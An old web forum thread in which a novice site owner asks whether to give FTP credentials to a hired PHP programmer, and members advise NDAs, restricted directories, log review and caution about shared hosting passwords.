providing server details to a hired programmer?
Results 1 to 9 of 9

Thread: providing server details to a hired programmer?

  1. #1
    Junior Member
    Join Date
    Oct 2005
    Posts
    5

    providing server details to a hired programmer?

    Hi guys, first time poster and i am glad i found this site, my question might sound silly but because of my inexpierence my future actions can be a big mistake from my part.

    I have hired a programmer to write a php script for me because i would have absolutely no idea where to start if i would have to do this but i am having difficulties installing the script so everything would work properly.

    The hired programmer offered to help out and he asked me if i could provide the log in details for the ftp account so he can upload and take a look at what i did wrong and he can adjust the whole thing so i can review it and learn from my mistakes.

    But can this situation be exploited in a harmfull manor?
    There is nothing special on the server as yet and in the future i would change the password when i would upload the site i have been working on.

    But could there be any kind of malware being installed without me ever knowing it and by granting him the log in details i would be cutting my own hands so to speak?

    Advice please?

  2. #2
    AO Decepticon CXGJarrod's Avatar
    Join Date
    Jul 2002
    Posts
    2,038
    Depending on how much work he is doing for you, you might want to get him to sign an NDA.
    N00b> STFU i r teh 1337 (english: You must be mistaken, good sir or madam. I believe myself to be quite a good player. On an unrelated matter, I also apparently enjoy math.)

  3. #3
    Leftie Linux Lover the_JinX's Avatar
    Join Date
    Nov 2001
    Location
    Beverwijk Netherlands
    Posts
    2,534
    Yup.. Get your company's lawyer to help you out with the details..

    It will save you a lot of worries..
    ASCII stupid question, get a stupid ANSI.
    When in Russia, pet a PETSCII.

    Get your ass over to SLAYRadio the best station for C64 Remixes !

  4. #4
    Right turn Clyde Nokia's Avatar
    Join Date
    Aug 2003
    Location
    Button Moon
    Posts
    1,696
    Is he from a professional firm or is he just kind of a "friend of a friend"?

    He can do damage if he has complete unrestricted access to your FTP sever.

    You can always scan your FTP server afterwards if you feel he has put something untoward on it. Examine your logs afterwards to see if he uploaded/down loaded any files or better yet be there when he is doing his work on it, ask him to come into your office to do it, that way you can always be at his side so you can keep an eye on what he is doing.

    Make an directory for him and only give him rights to that paticular directory, copy the PHP program to his directory so he can work on it there.

    And obviously it goes without saying remove the login details he used afterwards!
    Drugs have taught an entire generation of kids the metric system.

    http://tazforum.**********.com/

  5. #5
    Senior Member
    Join Date
    Jan 2003
    Posts
    3,914
    Hey Hey,

    As others have mentioned an NDA is definately the first thing you want to do.

    As far as releasing the credentials to the FTP... I personally wouldn't do it.. If it's just a page of php... there's no installing to be done. It's just a matter of uploading it... You could download the entire site and provide him with an archive containing all the files. Is this your own server, a company server or do you pay for hosting... If it's your own server or a company server make sure you don't give him credentials that are also a valid login for telnet/ssh if you have those services running and decide to give him access.. Also if it's hosting you pay for, be adviced that usually the cpanel, usermin, whatever management system you use has the same password as your FTP account... meaning he'll have full access to your hosting, which if it's like certain ones I have could contain credit card details.

    Nokia asked a good question in how you met him... I've done work on for a number of people, some who ran across business websites I've had, and others who were friends of a friend or relatives of a friend... and the work experience is different in either case...

    Does the server have php on it? If it doesn't that could be a good reason why the script doesn't work...

    Before you do anything ask him to justify how having FTP access will assist him and what he hopes to accomplish with the access. Let us know what you find out.

    Peace,
    HT
    IT Blog: .:Computer Defense:.
    PnCHd (Pronounced Pinched): Acronym - Point 'n Click Hacked. As in: "That website was pinched" or "The skiddie pinched my computer because I forgot to patch".

  6. #6
    Junior Member
    Join Date
    Oct 2005
    Posts
    5
    Thanks guys for your replies the site in question is a personal site and does not belong to a company.
    I'm kind of warry of the whole situation, i have aquired the services of the programmer through an online service.

    Would it be better for me to ask more specific instructions on how i should install the script myself?

  7. #7
    Right turn Clyde Nokia's Avatar
    Join Date
    Aug 2003
    Location
    Button Moon
    Posts
    1,696
    I would definatley go with what HT said and ask him why he wants FTP access and what will he do with it if he gets it.
    Drugs have taught an entire generation of kids the metric system.

    http://tazforum.**********.com/

  8. #8
    Junior Member
    Join Date
    Oct 2005
    Posts
    5
    Thanks guys for your support

  9. #9
    Senior Member
    Join Date
    Jan 2002
    Posts
    1,207
    Bear in mind, that you should get people who do work for you to sign an NDA and general contract.

    Even without any access to your production server, you still have to trust your programmer to write code competently and not create any backdoors - which of course would give them access anyway.

    If you don't trust someone, don't let them write PHP code for you, and don't give them access to your server either. They are equivalent.

    Slarty

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •